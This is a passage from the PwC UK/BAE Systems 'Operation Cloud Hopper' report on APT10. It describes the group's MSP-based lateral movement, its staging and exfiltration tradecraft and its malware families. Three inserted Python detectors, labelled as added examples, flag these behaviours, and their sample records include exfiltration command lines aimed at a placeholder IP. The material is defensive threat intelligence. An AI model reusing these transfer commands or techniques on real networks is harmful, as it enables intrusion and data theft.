We have observed the threat actor copying malware over to systems in a compromised environment which did not have any outbound internet access. In one of these instances, the threat actor spent more than an hour attempting to establish an outbound connection using PlugX until it realised that the host had no internet access, at which point the malware and all supporting files were deleted. APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots.

APT10 heavily leverages the shared nature of client-side MSP infrastructure to move laterally between MSPs and other victims. Systems that share access, and thus credentials, from both an MSP and one of its clients serve as a way of hopping between the two.
Figure 16: Client – MSP shared infrastructure (panels: Client infrastructure; MSP infrastructure). Systems sharing credentials across the client and the MSP are of particular interest to APT10, and are commonly used by the threat actor in order to gain access to new areas of the network.

Figure 15: Timeline of APT10 related activities (summary of APT10 activity, 2009 to 2017). APT10 activity: 2009, group first detected targeting Western defence companies; 2014, targets East Asian manufacturer and Japanese Public Policy organisations; Q4 2014, targets European organisations; Q4 2016, targets Japanese organisations; Q1 2017, APT10 sustains targeting of European organisations. Other events: August 2013, FireEye – Poison Ivy: Assessing damage and extracting intelligence; March 2014, Trend Micro & FireEye release reports on links between APT1 and APT10.
APT10 simultaneously targets both low profile and high value systems to gain network persistence and a high level of access respectively. For example, in addition to compromising high value domain controllers and security servers, the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business, and are thus less likely to draw the attention of system administrators.

As part of the long-term access to victim networks, we have observed APT10 consistently install updates and new malware on compromised systems. In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware; the actor also uses these methods to propagate across the network.

Communication checks are usually conducted using native Windows tools such as ping.exe, net.exe and tcping.exe. The actor will frequently ‘net use’ to several machines within several seconds, connecting for as little as five seconds, before disconnecting. Further details are provided in Annex B.
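The ‘net use’ burst described above can be checked for in process-creation telemetry; the following is an added example, not code from the report or its authors. It runs over constructed Sysmon Event ID 1 style records, flagging an account that mounts three or more hosts within ten seconds and sessions torn down within seconds of being opened. The record fields (ts, host, user, image, cmd), host names and account names are assumptions made for the demo.

```python
"""Flag bursts of short-lived 'net use' connections from one account.

Added example (not from the PwC/BAE report). Input is a list of parsed
process-creation records in a Sysmon Event ID 1 style; the field names
ts/host/user/image/cmd and the hosts below are constructed for the demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

NET_EXE = "C:\\Windows\\System32\\net.exe"


def _ev(ts, host, user, cmd):
    return {"ts": ts, "host": host, "user": user, "image": NET_EXE, "cmd": cmd}


# Constructed sample telemetry: an MSP service account on a management host touching
# four machines within ten seconds, plus an ordinary user's all-day drive mapping.
SAMPLE_EVENTS = [
    _ev("2017-03-01T02:14:05", "MGMT01", "CORP\\svc_msp", "net use \\\\FS01\\C$ /user:CORP\\svc_msp"),
    _ev("2017-03-01T02:14:07", "MGMT01", "CORP\\svc_msp", "net use \\\\FS02\\C$ /user:CORP\\svc_msp"),
    _ev("2017-03-01T02:14:09", "MGMT01", "CORP\\svc_msp", "net use \\\\FS01\\C$ /delete"),
    _ev("2017-03-01T02:14:11", "MGMT01", "CORP\\svc_msp", "net use \\\\DC01\\IPC$ /user:CORP\\svc_msp"),
    _ev("2017-03-01T02:14:12", "MGMT01", "CORP\\svc_msp", "net use \\\\FS02\\C$ /delete"),
    _ev("2017-03-01T02:14:13", "MGMT01", "CORP\\svc_msp", "net use \\\\FS03\\ADMIN$ /user:CORP\\svc_msp"),
    _ev("2017-03-01T02:14:15", "MGMT01", "CORP\\svc_msp", "net use \\\\DC01\\IPC$ /delete"),
    _ev("2017-03-01T02:14:18", "MGMT01", "CORP\\svc_msp", "net use \\\\FS03\\ADMIN$ /delete"),
    _ev("2017-03-01T09:30:00", "WS07", "CORP\\jsmith", "net use Z: \\\\FS01\\Share"),
    _ev("2017-03-01T17:45:10", "WS07", "CORP\\jsmith", "net use Z: /delete"),
]

NET_USE = re.compile(r"\bnet1?(?:\.exe)?\s+use\b", re.IGNORECASE)
UNC_HOST = re.compile(r"\\\\([^\\\s]+)")


def classify(event):
    """('connect' | 'disconnect', HOST) for a 'net use' command, else None."""
    cmd = event["cmd"]
    if not NET_USE.search(cmd):
        return None
    m = UNC_HOST.search(cmd)
    if not m:  # drive-letter-only forms such as 'net use Z: /delete' carry no host; not tracked
        return None
    kind = "disconnect" if re.search(r"/del(?:ete)?\b", cmd, re.IGNORECASE) else "connect"
    return kind, m.group(1).upper()


def find_bursts(events, window_s=10, min_targets=3):
    """One alert per (host, user) window in which >= min_targets distinct hosts were mounted."""
    connects = defaultdict(list)
    for e in events:
        c = classify(e)
        if c and c[0] == "connect":
            connects[(e["host"], e["user"])].append((datetime.fromisoformat(e["ts"]), c[1]))
    alerts = []
    for (host, user), items in connects.items():
        items.sort()
        i = 0
        while i < len(items):
            start = items[i][0]
            in_window = [t for ts, t in items[i:] if ts - start <= timedelta(seconds=window_s)]
            targets = sorted(set(in_window))
            if len(targets) >= min_targets:
                alerts.append({"host": host, "user": user, "start": start.isoformat(), "targets": targets})
                i += len(in_window)  # this window is consumed; continue after it
            else:
                i += 1
    return alerts


def short_sessions(events, max_s=10):
    """Pair each mount with its /delete and report sessions that lasted max_s seconds or less."""
    open_conns, found = {}, []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        c = classify(e)
        if c is None:
            continue
        kind, target = c
        key = (e["host"], e["user"], target)
        if kind == "connect":
            open_conns[key] = datetime.fromisoformat(e["ts"])
        elif key in open_conns:
            seconds = (datetime.fromisoformat(e["ts"]) - open_conns.pop(key)).total_seconds()
            if seconds <= max_s:
                found.append({"host": e["host"], "user": e["user"], "target": target, "seconds": seconds})
    return found


if __name__ == "__main__":
    for a in find_bursts(SAMPLE_EVENTS):
        print("burst:", a)
    for s in short_sessions(SAMPLE_EVENTS):
        print("short session:", s)
```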
Network hopping and exfiltration

Once APT10 have a foothold in victim networks, using either legitimate MSP or local domain credentials, or their sustained malware such as PlugX, RedLeaves or Quasar RAT, they will begin to identify systems of interest.

The operator will either access these systems over RDP, or browse folders using Remote Access Trojan (RAT) functionality, to identify data of interest. This data is then staged for exfiltration in multi-part archives, often placed in the Recycle Bin, using either RAR or TAR. The compression tools are often launched via a remote command execution script which is regularly named ‘t.vbs’ and is a customised version of an open source WMI command executor which pipes the command output back to the operator.

We have observed these archives being moved outside of the victim networks, either back into the MSP environments or to external IP addresses, by two methods, both of which are also performed via the command line using t.vbs:

1. Mounting the target external network share with ‘net use’ and subsequently using the legitimate Robocopy tool to transfer the data; and,
2. Using the legitimate PuTTY Secure Copy Client (PSCP), sometimes named rundll32.exe, to transfer the data directly to the third party system.

Using these techniques, APT10 ‘pushes’ data from victim networks to other networks they have access to, such as other MSP or victim networks, then, using similar methods, ‘pulls’ the data from those networks to locations from which they can directly obtain it, such as the threat actor’s C2 servers.

APT10’s ability to bridge networks can therefore be summarised as:

• Use of legitimate MSP credentials to management systems which bridge the MSP and multiple MSP customer networks;
• Use of RDP to interactively access systems in both the MSP management network and MSP customer networks;
• Use of t.vbs to execute command line tools; and,
• Use of PSCP and Robocopy to transfer data.
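The staging and transfer steps just listed each leave a trace in process-creation telemetry; the block below is an added example, not the report’s or PwC UK/BAE Systems’ code, that matches constructed Sysmon Event ID 1 style records against four of them: an archiver writing under $Recycle.Bin, cscript launching t.vbs, a PSCP binary whose version information disagrees with its on-disk name, and Robocopy pushing to a share on a host outside an allowlist. The field names (with orig standing for Sysmon’s OriginalFileName), the trusted-host list, the Recycle Bin SID and the 203.0.113.10 address are assumptions.

```python
"""Match process-creation records against the staging and transfer traces listed above.

Added example (not from the PwC/BAE report). Records are constructed in a
Sysmon Event ID 1 style; 'orig' stands for Sysmon's OriginalFileName, read from
the executable's version resource, which survives renaming the file on disk.
"""
import re

TRUSTED_SHARE_HOSTS = {"FS01", "FS02", "BACKUP01"}  # constructed allowlist of bulk-copy targets
TRANSFER_TOOLS = {"pscp.exe", "robocopy.exe", "rar.exe"}  # on-disk name should match version info
ARCHIVE_EXT = re.compile(r"\.(?:rar|r\d\d|tar|7z|zip)\b", re.IGNORECASE)
RECYCLE_BIN = re.compile(r"\$recycle\.bin\\", re.IGNORECASE)


def _ev(ts, image, orig, cmd):
    return {"ts": ts, "image": image, "orig": orig, "cmd": cmd}


# Constructed sample telemetry; the SID in the Recycle Bin path and 203.0.113.10 are placeholders.
SAMPLE_EVENTS = [
    _ev("2017-03-02T01:02:10", "C:\\Windows\\Temp\\rar.exe", "rar.exe",
        "rar.exe a -v50m C:\\$Recycle.Bin\\S-1-5-21-1111-2222-3333-1001\\d1.rar D:\\Projects"),
    _ev("2017-03-02T01:02:11", "C:\\Windows\\System32\\cscript.exe", "cscript.exe",
        "cscript.exe //nologo C:\\Windows\\Temp\\t.vbs FS02"),
    _ev("2017-03-02T01:20:44", "C:\\Windows\\Temp\\rundll32.exe", "pscp.exe",
        "rundll32.exe -P 443 C:\\$Recycle.Bin\\S-1-5-21-1111-2222-3333-1001\\d1.rar ops@203.0.113.10:/tmp/"),
    _ev("2017-03-02T01:25:03", "C:\\Windows\\System32\\Robocopy.exe", "robocopy.exe",
        "robocopy.exe D:\\staging \\\\203.0.113.10\\share /E"),
    _ev("2017-03-02T03:00:00", "C:\\Windows\\System32\\Robocopy.exe", "robocopy.exe",
        "robocopy.exe D:\\Data \\\\BACKUP01\\nightly /MIR"),
    _ev("2017-03-02T08:15:21", "C:\\Windows\\System32\\rundll32.exe", "RUNDLL32.EXE",
        "rundll32.exe shell32.dll,Control_RunDLL"),
    _ev("2017-03-02T08:40:00", "C:\\Tools\\pscp.exe", "pscp.exe",
        "pscp.exe -P 22 report.pdf ops@BACKUP01:/srv/reports/"),
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def renamed_tool(e):
    """A transfer or archive tool whose version information disagrees with its file name."""
    img, orig = _basename(e["image"]), e["orig"].lower()
    return f"{orig} renamed to {img}" if orig in TRANSFER_TOOLS and img != orig else None


def recycle_bin_archive(e):
    """An archive path under $Recycle.Bin on the command line (the staging location named above)."""
    if RECYCLE_BIN.search(e["cmd"]) and ARCHIVE_EXT.search(e["cmd"]):
        return "archive staged under $Recycle.Bin"
    return None


def tvbs_executor(e):
    """Windows Script Host running a script called t.vbs."""
    if _basename(e["image"]) in ("cscript.exe", "wscript.exe") and re.search(r"\bt\.vbs\b", e["cmd"], re.I):
        return "t.vbs remote command executor"
    return None


def robocopy_untrusted_share(e):
    """Robocopy whose destination (second positional argument) is a UNC share on an unlisted host."""
    if _basename(e["image"]) != "robocopy.exe":
        return None
    positional = [t for t in e["cmd"].split()[1:] if not t.startswith("/")]  # assumes unquoted paths
    if len(positional) >= 2 and positional[1].startswith("\\\\"):
        host = positional[1][2:].split("\\")[0].upper()
        if host not in TRUSTED_SHARE_HOSTS:
            return f"robocopy to untrusted share host {host}"
    return None


RULES = (renamed_tool, recycle_bin_archive, tvbs_executor, robocopy_untrusted_share)


def scan(events):
    """One hit per event matching at least one rule, carrying every matching reason."""
    hits = []
    for e in events:
        reasons = [r for r in (rule(e) for rule in RULES) if r]
        if reasons:
            hits.append({"ts": e["ts"], "image": e["image"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(h["ts"], h["image"], "->", "; ".join(h["reasons"]))
```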
APT10 malware

We classify APT10’s malware into two distinct areas: tactical and sustained. The tactical malware, historically EvilGrab, and now ChChes (and likely also RedLeaves), is designed to be lightweight and disposable, often being delivered through spear phishing. Once executed, tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest. The sustained malware, historically Poison Ivy and PlugX and now Quasar, provides a more comprehensive feature set. Intended to be deployed on key systems, the sustained malware facilitates long-term remote access and allows operators to more easily carry out administration tasks.

Since late 2016, we have seen the threat actor develop several bespoke malware families, such as ChChes and RedLeaves. Additionally, it has taken the open source malware, Quasar, and extended its capabilities, incrementing the internal version number as it does so.

We have also observed APT10 use DLL search order hijacking and sideloading to execute some modified versions of open-source tools. For example, PwC UK has observed APT10 compiling DLLs out of tools such as Mimikatz and PwDump6, and using legitimate, signed software, such as Windows Defender, to load the malicious payloads.

In Annex B we provide detailed analysis of several of the threat actor’s tools as well as the common Windows tools we have observed being used.
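The sideloading described above, a legitimately signed executable loading an unsigned DLL placed next to it, is visible in image-load telemetry; the block below is an added example, not the report’s code, run over constructed Sysmon Event ID 7 style records. The loader and DLL names, paths and signer list are placeholders, not the specific binaries APT10 used.

```python
"""Flag trusted-signed executables loading unsigned DLLs from their own directory.

Added example (not from the PwC/BAE report). Records mimic Sysmon Event ID 7
(image load): image = loading process, loaded = DLL path, plus signature
status for each. All names, paths and the signer list are constructed placeholders.
"""
import ntpath  # Windows path handling on any platform

TRUSTED_SIGNERS = {"microsoft windows", "microsoft corporation"}  # constructed; extend per environment

SAMPLE_LOADS = [
    # Signed system binary loading a signed system DLL: normal.
    {"image": "C:\\Windows\\System32\\svchost.exe", "image_signed": True, "signer": "Microsoft Windows",
     "loaded": "C:\\Windows\\System32\\wininet.dll", "loaded_signed": True},
    # Sideload pattern: a signed executable copied to a writable directory loads an unsigned
    # DLL placed beside it, which the search order finds before any legitimate copy.
    {"image": "C:\\ProgramData\\Update\\signedhost.exe", "image_signed": True, "signer": "Microsoft Corporation",
     "loaded": "C:\\ProgramData\\Update\\helper.dll", "loaded_signed": False},
    # Unsigned in-house tool loading its own unsigned DLL: not this pattern.
    {"image": "C:\\Tools\\inventory.exe", "image_signed": False, "signer": "",
     "loaded": "C:\\Tools\\inventory.dll", "loaded_signed": False},
    # Signed host loading a signed DLL from its own directory: normal.
    {"image": "C:\\Program Files\\Vendor\\app.exe", "image_signed": True, "signer": "Microsoft Corporation",
     "loaded": "C:\\Program Files\\Vendor\\app.dll", "loaded_signed": True},
]


def is_sideload_candidate(rec):
    """True when a trusted-signed process loads an unsigned DLL from the directory it runs from."""
    if not rec["image_signed"] or rec["signer"].lower() not in TRUSTED_SIGNERS:
        return False
    if rec["loaded_signed"]:
        return False
    exe_dir = ntpath.dirname(rec["image"]).lower()
    dll_dir = ntpath.dirname(rec["loaded"]).lower()
    return exe_dir == dll_dir


def find_sideloads(records):
    """Return the records worth an analyst's attention, in input order."""
    return [r for r in records if is_sideload_candidate(r)]


if __name__ == "__main__":
    for r in find_sideloads(SAMPLE_LOADS):
        print(f"possible sideload: {r['image']} loaded unsigned {r['loaded']}")
```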
Timeline

Figure 17: Timeline of APT10 malware use, 2009 to 2017: Poison Ivy, PlugX, EvilGrab, ChChes, Quasar, RedLeaves.

Retooling Efforts

Alongside APT10’s TTPs, we have observed a ‘retooling’ cycle. Given the pace of technological change and the wide range of freely available online tools and scripts, it is not unusual for an actor to re-evaluate its capabilities and to benchmark multiple offerings against each other. We have observed a decline in the deployment of some of APT10’s traditional core tool set, and witnessed an increase in the development and deployment of additional new tools which combine in-house development and open source projects. We assess that this is highly likely due to the public release of APT10 malware by cyber security vendors.

Throughout our investigations, we have observed multiple deployments of the PlugX malware from 2014 to at least 2016. This, along with the downturn in the use of Poison Ivy, supports the notion that a major retooling operation took place post 2014. Additional analysis of the infrastructure associated with each distinct version of PlugX also shows an increase in maturity over time. Earlier PlugX versions were configured with legacy domains and IP addresses, which were originally isolated and more obvious, whereas more recent versions have demonstrated a standardised convention for domain names and IP selection.

During our analysis of victim networks, we were able to observe APT10 once again initiate a retooling cycle in late 2016. We observed the deployment and testing of multiple versions of Quasar malware,16 and the introduction of the bespoke malware families ChChes and RedLeaves.

We assess it is highly likely that, due to the frequent public release of information linking PlugX with China-based threat actors, continual long-term use had become unsustainable, introducing an additional operational overhead that is easily attributable to China-based threat actors.

16 https://github.com/quasar/QuasarRAT
Conclusion

APT10 is a constantly evolving, highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors, enabled by its strategic targeting.

Since exposure of its operations in 2013, APT10 has made a number of significant changes intended to thwart detection of its campaigns. PwC UK and BAE Systems, working closely with industry and government, have uncovered a new, unparalleled campaign which we refer to as Operation Cloud Hopper. This operation has targeted managed IT service providers, the compromise of which provides APT10 with potential access to thousands of further victims. An additional campaign has also been observed targeting Japanese entities.

APT10’s malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns; this is indicative of APT10’s increasing sophistication, which is highly likely to continue. The threat actor’s known working hours align to Chinese Standard Time (CST) and its targeting corresponds to that of other known China-based threat actors, which supports our assessment that these campaigns are conducted by APT10.

This campaign serves to highlight the importance of organisations having a comprehensive view of their threat profile, including that of their supply chains. More broadly, it should also encourage organisations to fully assess the risk posed by their third party relationships, and prompt them to take appropriate steps to assure and manage these.

A detailed technical annex, which provides further information about the tools and techniques used by APT10 and contains Indicators of Compromise relating to all of this threat actor’s known campaigns, supplements this main report. These have already been provided to the National Cyber Security Centre for dissemination through their usual channels.
Appendices
Appendix A

Collaboration between PwC UK and BAE Systems

PwC and BAE Systems’ respective Threat Intelligence teams share a mutual interest in new cyber threats. PwC and BAE Systems partnered through their membership of the Cyber Incident Response (CIR) scheme to share intelligence and develop the most comprehensive picture possible of this threat actor’s activities. Information sharing like this underpins the security research community and serves to aid remediation and inform decisions that companies make about their security needs.

Probabilistic language

Interpretations of probabilistic language (for example, “likely” or “almost certainly”) vary widely, and to avoid misinterpretation we have used the following qualitative terms within this report when referring to the level of confidence we have in our assessments. Unless otherwise stated, our assessments are not based on statistical analysis.

Qualitative term                  Associated probability range
Remote or highly unlikely         Less than 10%
Improbable or unlikely            10-25%
Realistic probability             26-50%
Probable or likely                51-75%
Highly probable or highly likely  76-90%
Almost certain                    More than 90%
Appendix B

PwC UK reporting

PwC UK Threat Intelligence has previously published a range of APT10 related reporting, both in the public domain and via our subscription service. These reports are as follows:

• APT10 resumes operations with a vengeance, in Threats Under the Spotlight – CTO-TUS-20170321-01A
• NetEaseX and the Secret Key to Lisboa – CTO-TIB-20170313-01A – BlackDLL
• APT10’s .NET Foray – CTO-TIB-20170301-01B – Quasar
• APT10 pauses for Chinese New Year, in Threats Under the Spotlight – CTO-TUS-20170220-01A
• CVNX’s sting in the tail – CTO-TIB-20170123-01A – ChChes (Scorpion) Malware
• China and Japan: APT to dispute – CTO-SIB-20170119-01A
• Taiwan Presidential Election: A Case Study on Thematic Targeting, http://pwc.blogs.com/cyber_security_updates/2016/03/taiwant-election-targetting.html, published 2016-03-17. Overview of EvilGrab and it being used against Asian targets, specifically around the 2016 Taiwanese election
• Scanbox II – CTO-TIB-20150223-01A
• “IST-Red Apollo-002 – Red Apollo Tearsheet”

Third party reports

A number of organisations have also published related reporting, as follows:

• RedLeaves – Malware Based on Open Source RAT, http://blog.jpcert.or.jp/2017/04/redleaves---malwarebased-on-open-source-rat.html. Further technical reporting on RedLeaves, revealing links to an open source RAT.
• The relevance between the attacker group menuPass and malware (Poison Ivy, PlugX, ChChes), https://www.lac.co.jp/lacwatch/people/20170223_001224.html, published 2017-02-23. Links APT10 to ChChes, Poison Ivy and PlugX.
• menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations, http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malwarenew-attacks-japanese-academics-organizations/, published 2017-02-16. APT10 attacks on Japanese academics. Includes info on ChChes (technical), Poison Ivy and PlugX.
• ChChes – Malware that Communicates with C&C Servers Using Cookie Headers, http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html, published 2017-02-15. Technical overview of ChChes malware with IOCs.
• PlugX TrendMicro “tearsheet”, https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/plugx, published 2016-09-07. Technical info and IOCs for PlugX.
• A Detailed Examination of the Siesta Campaign, https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-thesiesta-campaign.html, published 2014-03-12. Provides a detailed analysis of activity dubbed the Siesta campaign.
• POISON IVY: Assessing Damage and Extracting Intelligence, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poisonivy.pdf, published 2013-08-21. Technical report on Poison Ivy and campaigns that have used it, including menuPass.
• EvilGrab Malware Family Used In Targeted Attacks In Asia, http://blog.trendmicro.com/trendlabs-securityintelligence/evilgrab-malware-family-used-in-targetedattacks-in-asia/, published 2013-09-18. Technical overview of EvilGrab.
• CrowdCasts Monthly: You Have an Adversary Problem, https://www.slideshare.net/CrowdStrike/crowd-castsmonthly-you-have-an-adversary-problem, published 2013-10-16, a presentation on Chinese actors including APT, crime and hacktivist. Includes section on Stone Panda (APT10).
• PlugX: New Tool For a Not So New Campaign, http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/, published 2012-09-10. Gives an introduction to PlugX.
• Pulling the Plug on PlugX, https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/112/pulling-the-plug-on-plugx, published 2012-08-04. Gives a technical overview of PlugX and what it is used for.
About PwC

At PwC, our purpose is to build trust in society and solve important problems. We’re a network of firms in 157 countries with more than 223,000 people who are committed to delivering quality in assurance, advisory and tax services.

PwC UK’s cyber security team is a part of this mission, helping clients around the world to assess, build and manage their cyber security capabilities and to identify and respond to incidents through a range of services including threat intelligence, threat detection and incident response.

We are BAE Systems

At BAE Systems, we provide some of the world’s most advanced technology defence, aerospace and security solutions.

At BAE Systems Applied Intelligence, we help nations, governments and businesses around the world defend themselves against cybercrime, reduce their risk in the connected world, comply with regulation, and transform their operations. We do this using our unique set of solutions, systems, experience and processes – often collecting and analysing huge volumes of data.

This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.

© 2017 PricewaterhouseCoopers LLP. All rights reserved. In this document, “PwC” refers to the UK member firm, and may sometimes refer to the PwC network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further details.

170328-155605-GC-UK